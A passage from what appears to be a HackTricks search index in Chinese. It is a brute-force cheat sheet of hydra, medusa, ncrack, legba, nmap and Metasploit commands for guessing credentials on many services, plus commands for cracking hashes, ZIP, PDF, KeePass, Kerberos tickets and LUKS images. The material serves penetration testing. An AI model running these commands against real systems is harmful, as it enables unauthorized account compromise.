set BLANK_PASSWORDS true\\nmsf> set USER_AS_PASS true\\nmsf> set PASS_FILE \\nmsf> set USER_FILE \\nmsf> run","breadcrumbs":"Brute Force - CheatSheet » AFP","id":"1054","title":"AFP"},"1055":{"body":"bash nmap --script ajp-brute -p 8009 ","breadcrumbs":"Brute Force - CheatSheet » AJP","id":"1055","title":"AJP"},"1056":{"body":"bash legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]","breadcrumbs":"Brute Force - CheatSheet » AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)","id":"1056","title":"AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM 和 Solace)"},"1057":{"body":"bash nmap --script cassandra-brute -p 9160 \\n# legba ScyllaDB / Apache Casandra\\nlegba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042","breadcrumbs":"Brute Force - CheatSheet » 卡桑德拉","id":"1057","title":"卡桑德拉"},"1058":{"body":"bash msf> use auxiliary/scanner/couchdb/couchdb_login\\nhydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /","breadcrumbs":"Brute Force - CheatSheet » CouchDB","id":"1058","title":"CouchDB"},"1059":{"body":"hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/","breadcrumbs":"Brute Force - CheatSheet » Docker 注册表","id":"1059","title":"Docker 注册表"},"106":{"body":"有 2 种选项可以扫描 UDP 端口: 发送一个 UDP packet ,并检查是否收到 ICMP unreachable 响应以判断端口是否为 closed (在多种情况下 ICMP 会被 filtered ,所以你不会收到端口是 closed 还是 open 的任何信息)。 发送 formatted datagrams 去触发 service 的响应(例如 DNS、DHCP、TFTP 等,详见 nmap-payloads )。如果你收到 response ,则该端口为 open 。 Nmap 将使用 \\"-sV\\" 把这两种选项 mix both (UDP scans 非常慢),但请注意 UDP scans 比 TCP scans 更慢: bash # Check if any of the most common udp services is running\\nudp-proto-scanner.pl \\n# Nmap fast check if any of the 100 most common UDP services is running\\nnmap -sU -sV --version-intensity 0 -n -F -T4 \\n# Nmap check if any of the 100 most common UDP services is 
running and launch defaults scripts\\nnmap -sU -sV -sC -n -F -T4 \\n# Nmap \\"fast\\" top 1000 UDP ports\\nnmap -sU -sV --version-intensity 0 -n -T4 \\n# You could use nmap to test all the UDP ports, but that will take a lot of time","breadcrumbs":"Pentesting Network » UDP","id":"106","title":"UDP"},"1060":{"body":"hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /","breadcrumbs":"Brute Force - CheatSheet » Elasticsearch","id":"1060","title":"Elasticsearch"},"1061":{"body":"bash hydra -l root -P passwords.txt [-t 32] ftp\\nncrack -p 21 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M ftp\\nlegba ftp --username admin --password wordlists/passwords.txt --target localhost:21","breadcrumbs":"Brute Force - CheatSheet » FTP","id":"1061","title":"FTP"},"1062":{"body":"WFuzz","breadcrumbs":"Brute Force - CheatSheet » HTTP 通用暴力破解","id":"1062","title":"HTTP 通用暴力破解"},"1063":{"body":"bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/\\n# Use https-get mode for https\\nmedusa -h -u -P -M http -m DIR:/path/to/auth -T 10\\nlegba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/","breadcrumbs":"Brute Force - CheatSheet » HTTP 基本认证","id":"1063","title":"HTTP 基本认证"},"1064":{"body":"bash legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/\\nlegba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/","breadcrumbs":"Brute Force - CheatSheet » HTTP - NTLM","id":"1064","title":"HTTP - NTLM"},"1065":{"body":"bash hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form 
\\"/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect\\" -V\\n# Use https-post-form mode for https 对于 http s ,您必须将 \\"http-post-form\\" 更改为 \\" https-post-form \\"","breadcrumbs":"Brute Force - CheatSheet » HTTP - Post 表单","id":"1065","title":"HTTP - Post 表单"},"1066":{"body":"bash cmsmap -f W/J/D/M -u a -p a https://wordpress.com\\n# Check also https://github.com/evilsocket/legba/wiki/HTTP","breadcrumbs":"Brute Force - CheatSheet » HTTP - CMS -- (W)ordpress, (J)oomla 或 (D)rupal 或 (M)oodle","id":"1066","title":"HTTP - CMS -- (W)ordpress, (J)oomla 或 (D)rupal 或 (M)oodle"},"1067":{"body":"bash hydra -l USERNAME -P /path/to/passwords.txt -f imap -V\\nhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f imap -V\\nnmap -sV --script imap-brute -p \\nlegba imap --username user --password data/passwords.txt --target localhost:993","breadcrumbs":"Brute Force - CheatSheet » IMAP","id":"1067","title":"IMAP"},"1068":{"body":"bash nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p ","breadcrumbs":"Brute Force - CheatSheet » IRC","id":"1068","title":"IRC"},"1069":{"body":"bash nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 ","breadcrumbs":"Brute Force - CheatSheet » ISCSI","id":"1069","title":"ISCSI"},"107":{"body":"SCTP (Stream Control Transmission Protocol) 旨在与 TCP (Transmission Control Protocol) 和 UDP (User Datagram Protocol) 一起使用。它的主要目的是促进电话数据在 IP 网络上的传输,借鉴了 Signaling System 7 (SS7) 中的许多可靠性特性。SCTP 是 SIGTRAN 协议族的核心组件,该协议族旨在将 SS7 信号通过 IP 网络传输。 多种操作系统(如 IBM AIX、Oracle Solaris、HP-UX、Linux、Cisco IOS 和 VxWorks)均提供对 SCTP 的支持,表明它在电信和网络领域被广泛接受并且非常有用。 nmap 为 SCTP 提供两种不同的扫描: -sY 和 -sZ bash # Nmap fast SCTP scan\\nnmap -T4 -sY -n -oA SCTFastScan \\n# Nmap all SCTP scan\\nnmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ","breadcrumbs":"Pentesting Network » SCTP Scan","id":"107","title":"SCTP Scan"},"1070":{"body":"bash 
#hashcat\\nhashcat -m 16500 -a 0 jwt.txt .\\\\wordlists\\\\rockyou.txt #https://github.com/Sjord/jwtcrack\\npython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt #John\\njohn jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256 #https://github.com/ticarpi/jwt_tool\\npython3 jwt_tool.py -d wordlists.txt #https://github.com/brendan-rius/c-jwt-cracker\\n./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8 #https://github.com/mazen160/jwt-pwn\\npython3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt #https://github.com/lmammino/jwt-cracker\\njwt-cracker \\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\\" \\"abcdefghijklmnopqrstuwxyz\\" 6","breadcrumbs":"Brute Force - CheatSheet » JWT","id":"1070","title":"JWT"},"1071":{"body":"bash nmap --script ldap-brute -p 389 \\nlegba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match","breadcrumbs":"Brute Force - CheatSheet » LDAP","id":"1071","title":"LDAP"},"1072":{"body":"ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v\\nlegba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » MQTT","id":"1072","title":"MQTT"},"1073":{"body":"bash nmap -sV --script mongodb-brute -n -p 27017 \\nuse auxiliary/scanner/mongodb/mongodb_login\\nlegba mongodb --target localhost:27017 --username root --password data/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » 
Mongo","id":"1073","title":"Mongo"},"1074":{"body":"MSSQLPwner shell # Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt # Bruteforce using tickets against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt # Bruteforce using passwords against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt # Bruteforce using hashes against the hosts listed on the hosts.txt\\nmssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433","breadcrumbs":"Brute Force - CheatSheet » MSSQL","id":"1074","title":"MSSQL"},"1075":{"body":"bash # hydra\\nhydra -L usernames.txt -P pass.txt mysql # msfconsole\\nmsf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false # medusa\\nmedusa -h -u -P <-f | to stop medusa on first success attempt> -t -M mysql #Legba\\nlegba mysql --username root --password wordlists/passwords.txt --target localhost:3306","breadcrumbs":"Brute Force - CheatSheet » MySQL","id":"1075","title":"MySQL"},"1076":{"body":"bash patator oracle_login sid= host= user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017 ./odat.py passwordguesser -s $SERVER -d $SID\\n./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt #msf1\\nmsf> use admin/oracle/oracle_login\\nmsf> set RHOSTS \\nmsf> set RPORT 1521\\nmsf> set SID #msf2, this option uses nmap and it fails sometimes for some reason\\nmsf> use scanner/oracle/oracle_login\\nmsf> set RHOSTS \\nmsf> set RPORTS 1521\\nmsf> set SID #for some reason nmap fails sometimes when executing this script\\nnmap --script 
oracle-brute -p 1521 --script-args oracle-brute.sid= legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt 为了使用 oracle_login 和 patator ,您需要 安装 : bash pip3 install cx_Oracle --upgrade 离线 OracleSQL 哈希暴力破解 ( 版本 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, 和 11.2.0.3 ): bash nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30","breadcrumbs":"Brute Force - CheatSheet » OracleSQL","id":"1076","title":"OracleSQL"},"1077":{"body":"bash hydra -l USERNAME -P /path/to/passwords.txt -f pop3 -V\\nhydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f pop3 -V # Insecure\\nlegba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110 # SSL\\nlegba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl","breadcrumbs":"Brute Force - CheatSheet » POP","id":"1077","title":"POP"},"1078":{"body":"bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt postgres\\nmedusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres\\nncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt :5432\\npatator pgsql_login host= user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt\\nuse auxiliary/scanner/postgres/postgres_login\\nnmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 \\nlegba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432","breadcrumbs":"Brute Force - CheatSheet » PostgreSQL","id":"1078","title":"PostgreSQL"},"1079":{"body":"您可以从 https://http.kali.org/pool/main/t/thc-pptp-bruter/ 下载 .deb 包进行安装。 bash sudo dpkg -i thc-pptp-bruter*.deb #Install the package\\ncat rockyou.txt | thc-pptp-bruter –u ","breadcrumbs":"Brute Force - CheatSheet » PPTP","id":"1079","title":"PPTP"},"108":{"body":"IDS and IPS Evasion","breadcrumbs":"Pentesting Network » IDS 和 IPS 
绕过","id":"108","title":"IDS 和 IPS 绕过"},"1080":{"body":"bash ncrack -vv --user -P pwds.txt rdp://\\nhydra -V -f -L -P rdp://\\nlegba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]","breadcrumbs":"Brute Force - CheatSheet » RDP","id":"1080","title":"RDP"},"1081":{"body":"bash msf> use auxiliary/scanner/redis/redis_login\\nnmap --script redis-brute -p 6379 \\nhydra –P /path/pass.txt redis://: # 6379 is the default\\nlegba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]","breadcrumbs":"Brute Force - CheatSheet » Redis","id":"1081","title":"Redis"},"1082":{"body":"bash hydra -l -P rexec:// -v -V","breadcrumbs":"Brute Force - CheatSheet » Rexec","id":"1082","title":"Rexec"},"1083":{"body":"bash hydra -l -P rlogin:// -v -V","breadcrumbs":"Brute Force - CheatSheet » Rlogin","id":"1083","title":"Rlogin"},"1084":{"body":"bash hydra -L rsh:// -v -V http://pentestmonkey.net/tools/misc/rsh-grind","breadcrumbs":"Brute Force - CheatSheet » Rsh","id":"1084","title":"Rsh"},"1085":{"body":"bash nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 ","breadcrumbs":"Brute Force - CheatSheet » Rsync","id":"1085","title":"Rsync"},"1086":{"body":"bash hydra -l root -P passwords.txt rtsp","breadcrumbs":"Brute Force - CheatSheet » RTSP","id":"1086","title":"RTSP"},"1087":{"body":"bash legba sftp --username admin --password wordlists/passwords.txt --target localhost:22\\n# Try keys from a folder\\nlegba sftp --username admin --password \'@/some/path/*\' --ssh-auth-mode key --target localhost:22","breadcrumbs":"Brute Force - CheatSheet » SFTP","id":"1087","title":"SFTP"},"1088":{"body":"bash msf> use auxiliary/scanner/snmp/snmp_login\\nnmap -sU --script snmp-brute [--script-args snmp-brute.communitiesdb= ]\\nonesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt \\nhydra -P 
/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp","breadcrumbs":"Brute Force - CheatSheet » SNMP","id":"1088","title":"SNMP"},"1089":{"body":"bash nmap --script smb-brute -p 445 \\nhydra -l Administrator -P words.txt 192.168.1.12 smb -t 1\\nlegba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ]","breadcrumbs":"Brute Force - CheatSheet » SMB","id":"1089","title":"SMB"},"109":{"body":"Nmap Summary (ESP)","breadcrumbs":"Pentesting Network » 更多 nmap 选项","id":"109","title":"更多 nmap 选项"},"1090":{"body":"bash hydra -l -P /path/to/passwords.txt smtp -V\\nhydra -l -P /path/to/passwords.txt -s 587 -S -v -V #Port 587 for SMTP with SSL\\nlegba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ]","breadcrumbs":"Brute Force - CheatSheet » SMTP","id":"1090","title":"SMTP"},"1091":{"body":"bash nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 \\nlegba socks5 --target localhost:1080 --username admin --password data/passwords.txt\\n# With alternative address\\nlegba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address \'internal.company.com\' --socks5-port 8080","breadcrumbs":"Brute Force - CheatSheet » SOCKS","id":"1091","title":"SOCKS"},"1092":{"body":"bash #Use the NetBIOS name of the machine as domain\\ncrackmapexec mssql -d -u usernames.txt -p passwords.txt\\nhydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt mssql\\nmedusa -h –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql\\nnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts #Use domain if needed. 
Be careful with the number of passwords in the list, this could block accounts\\nmsf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts (check the domain lockout policy first). If you have a domain set it and use USE_WINDOWS_AUTHENT","breadcrumbs":"Brute Force - CheatSheet » SQL Server","id":"1092","title":"SQL Server"},"1093":{"body":"bash hydra -l root -P passwords.txt [-t 32] ssh\\nncrack -p 22 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M ssh\\npatator ssh_login host= port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg=\'Authentication failed\'\\nlegba ssh --username admin --password wordlists/passwords.txt --target localhost:22\\n# Try keys from a folder\\nlegba ssh --username admin --password \'@/some/path/*\' --ssh-auth-mode key --target localhost:22 弱 SSH 密钥 / Debian 可预测 PRNG 某些系统生成密钥时所用的随机数生成器存在已知缺陷(例如旧版 Debian 的可预测 OpenSSL PRNG),导致实际可能的密钥空间大幅缩小,可以用 snowdroppe/ssh-keybrute 等工具对其进行暴力破解;也可以直接使用预先生成好的弱密钥集合(如 g0tmi1k/debian-ssh)逐一尝试登录。","breadcrumbs":"Brute Force - CheatSheet » SSH","id":"1093","title":"SSH"},"1094":{"body":"STOMP 文本协议是一种广泛使用的消息传递协议, 允许与流行的消息队列服务如 RabbitMQ、ActiveMQ、HornetQ 和 OpenMQ 进行无缝通信和交互 。它提供了一种标准化和高效的方法来交换消息并执行各种消息操作。 bash legba stomp --target localhost:61613 --username admin --password data/passwords.txt","breadcrumbs":"Brute Force - CheatSheet » STOMP (ActiveMQ, RabbitMQ, HornetQ 和 OpenMQ)","id":"1094","title":"STOMP (ActiveMQ, RabbitMQ, HornetQ 和 OpenMQ)"},"1095":{"body":"bash hydra -l root -P passwords.txt [-t 32] telnet\\nncrack -p 23 --user root -P passwords.txt [-T 5]\\nmedusa -u root -P 500-worst-passwords.txt -h -M telnet legba telnet \\\\\\n--username admin \\\\\\n--password wordlists/passwords.txt \\\\\\n--target localhost:23 \\\\\\n--telnet-user-prompt \\"login: \\" \\\\\\n--telnet-pass-prompt \\"Password: \\" \\\\\\n--telnet-prompt \\":~$ \\" \\\\\\n--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin","breadcrumbs":"Brute Force - CheatSheet » 
Telnet","id":"1095","title":"Telnet"},"1096":{"body":"bash hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s vnc\\nmedusa -h –u root -P /root/Desktop/pass.txt –M vnc\\nncrack -V --user root -P /root/Desktop/pass.txt IP:PORT\\npatator vnc_login host= password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgrep!=\'Authentication failure\' --max-retries 0 –x quit:code=0\\nuse auxiliary/scanner/vnc/vnc_login\\nnmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt \\nlegba vnc --target localhost:5901 --password data/passwords.txt #Metasploit\\nuse auxiliary/scanner/vnc/vnc_login\\nset RHOSTS \\nset PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst","breadcrumbs":"Brute Force - CheatSheet » VNC","id":"1096","title":"VNC"},"1097":{"body":"bash crackmapexec winrm -d -u usernames.txt -p passwords.txt","breadcrumbs":"Brute Force - CheatSheet » Winrm","id":"1097","title":"Winrm"},"1098":{"body":"","breadcrumbs":"Brute Force - CheatSheet » 本地","id":"1098","title":"本地"},"1099":{"body":"http://hashtoolkit.com/reverse-hash? (MD5 & SHA1) https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 有/无 ESS/SSP 和任何挑战值) https://www.onlinehashcrack.com/ (哈希,WPA2 捕获,以及 MSOffice、ZIP、PDF 等档案...) https://crackstation.net/ (哈希) https://md5decrypt.net/ (MD5) https://gpuhash.me/ (哈希和文件哈希) https://hashes.org/search.php (哈希) https://www.cmd5.org/ (哈希) https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512) https://www.md5online.org/md5-decrypt.html (MD5) http://reverse-hash-lookup.online-domain-tools.com/ 在本地暴力破解哈希之前,可以先到这些在线数据库查询是否已被破解。注意:向这些服务提交哈希等同于把它交给第三方;对于客户环境或授权测试中获得的哈希,请先确认交战规则允许外传。","breadcrumbs":"Brute Force - CheatSheet » 在线破解数据库","id":"1099","title":"在线破解数据库"},"11":{"body":"WebSec 是一家总部位于 阿姆斯特丹 的专业网络安全公司,帮助 保护 全球企业免受最新网络安全威胁,通过提供 进攻性安全服务 采用 现代 方法。 WebSec 是一家国际安全公司,在阿姆斯特丹和怀俄明州设有办事处。他们提供 一体化安全服务 ,这意味着他们可以做所有事情;渗透测试、 安全 审计、意识培训、网络钓鱼活动、代码审查、漏洞开发、安全专家外包等等。 WebSec 的另一个酷点是,与行业平均水平不同,WebSec 对他们的技能 非常自信 ,以至于他们 保证最佳质量结果 ,他们在网站上声明“ 如果我们无法攻破它,您就不需要支付! ”。有关更多信息,请查看他们的 网站 和 博客 ! 
除了上述内容,WebSec 还是 HackTricks 的坚定支持者 。 - YouTube","breadcrumbs":"HackTricks » WebSec","id":"11","title":"WebSec"},"110":{"body":"配置错误的 routers、firewalls 和 network devices 有时会在响应网络探测时使用 非公网源地址 。可以使用 tcpdump 在测试期间识别从私有地址接收到的 packets。具体来说,在 Kali Linux 上,可以在可从公共 Internet 访问的 eth2 interface 上捕获 packets。需要注意的是,如果你的设置位于 NAT 或 Firewall 之后,此类 packets 很可能会被过滤掉。 bash tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16\\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\\nlistening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes\\nIP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64\\nIP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64","breadcrumbs":"Pentesting Network » 揭示内部 IP 地址","id":"110","title":"揭示内部 IP 地址"},"1100":{"body":"bash #sudo apt-get install fcrackzip\\nfcrackzip -u -D -p \'/usr/share/wordlists/rockyou.txt\' chall.zip bash zip2john file.zip > zip.john\\njohn zip.john bash #$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$\\nhashcat.exe -m 13600 -a 0 .\\\\hashzip.txt .\\\\wordlists\\\\rockyou.txt\\n.\\\\hashcat.exe -m 13600 -i -a 0 .\\\\hashzip.txt #Incremental attack 已知明文 zip 攻击 您需要知道加密 zip 中包含的文件的 明文 (或部分明文)。您可以通过运行 7z l encrypted.zip 来检查加密 zip 中包含的 文件名和文件大小 。 从发布页面下载 bkcrack 。 bash # You need to create a zip file containing only the file that is inside the encrypted zip\\nzip plaintext.zip plaintext.file ./bkcrack -C -c -P -p \\n# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18\\n# With that key you can create a new zip file with the content of encrypted.zip\\n# but with a different pass that you set (so you can decrypt it)\\n./bkcrack -C -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd\\nunzip unlocked.zip #User new_pwd as password","breadcrumbs":"Brute Force - CheatSheet » ZIP","id":"1100","title":"ZIP"},"1101":{"body":"bash cat 
/usr/share/wordlists/rockyou.txt | 7za t backup.7z bash #Download and install requirements for 7z2john\\nwget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl\\napt-get install libcompress-raw-lzma-perl\\n./7z2john.pl file.7z > 7zhash.john","breadcrumbs":"Brute Force - CheatSheet » 7z","id":"1101","title":"7z"},"1102":{"body":"bash apt-get install pdfcrack\\npdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt\\n#pdf2john didn\'t work well, john didn\'t know which hash type was\\n# To permanently decrypt the pdf\\nsudo apt-get install qpdf\\nqpdf --password= --decrypt encrypted.pdf plaintext.pdf","breadcrumbs":"Brute Force - CheatSheet » PDF","id":"1102","title":"PDF"},"1103":{"body":"要破解 PDF 拥有者密码,请查看此链接: https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/","breadcrumbs":"Brute Force - CheatSheet » PDF Owner Password","id":"1103","title":"PDF Owner Password"},"1104":{"body":"bash git clone https://github.com/Sjord/jwtcrack.git\\ncd jwtcrack #Bruteforce using crackjwt.py\\npython crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt #Bruteforce using john\\npython jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john\\njohn jwt.john #It does not work with Kali-John","breadcrumbs":"Brute Force - CheatSheet » JWT","id":"1104","title":"JWT"},"1105":{"body":"bash Format:USUARIO:ID:HASH_LM:HASH_NT:::\\njohn --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes\\nhashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot","breadcrumbs":"Brute Force - CheatSheet » NTLM 破解","id":"1105","title":"NTLM 破解"},"1106":{"body":"bash sudo apt-get install -y kpcli #Install 
keepass tools like keepass2john\\nkeepass2john file.kdbx > hash #The keepass is only using password\\nkeepass2john -k KEYFILE file.kdbx > hash # The keepass is also using a key file as a needed credential\\n#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john\\njohn --wordlist=/usr/share/wordlists/rockyou.txt hash","breadcrumbs":"Brute Force - CheatSheet » Keepass","id":"1106","title":"Keepass"},"1107":{"body":"bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast\\nhashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt\\n./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi 注意:hashcat -m 13100 只对应 RC4 (etype 23) 的 TGS-REP 票据;如果服务账户只返回 AES 票据 (etype 17/18),需改用 -m 19600 (AES128) 或 -m 19700 (AES256)。","breadcrumbs":"Brute Force - CheatSheet » Kerberoasting","id":"1107","title":"Kerberoasting"},"1108":{"body":"方法 1 安装: https://github.com/glv2/bruteforce-luks bash bruteforce-luks -f ./list.txt ./backup.img\\ncryptsetup luksOpen backup.img mylucksopen\\nls /dev/mapper/ #You should find here the image mylucksopen\\nmount /dev/mapper/mylucksopen /mnt 方法 2 bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096\\ndd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1\\nhashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt\\ncryptsetup luksOpen backup.img mylucksopen\\nls /dev/mapper/ #You should find here the image mylucksopen\\nmount /dev/mapper/mylucksopen /mnt 注意:hashcat -m 14600 只支持 LUKS1 头部;若 luksDump 显示为 LUKS2 (通常使用 argon2 KDF),该模式不适用,需要使用其它针对 LUKS2 的方法。 另一个 LUKS 暴力破解教程: http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1","breadcrumbs":"Brute Force - CheatSheet » LUKS 镜像","id":"1108","title":"LUKS 镜像"},"1109":{"body":"bash #John hash format\\nUSER:$mysqlna$CHALLENGE*RESPONSE\\ndbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d","breadcrumbs":"Brute Force - CheatSheet » Mysql","id":"1109","title":"Mysql"},"111":{"body":"通过 Sniffing,可以通过查看捕获的 frames and packets 来了解 IP ranges、subnet sizes、MAC addresses 和 hostnames 的详细信息。如果网络配置错误或 switching fabric 在承压时,攻击者可以通过 passive network 
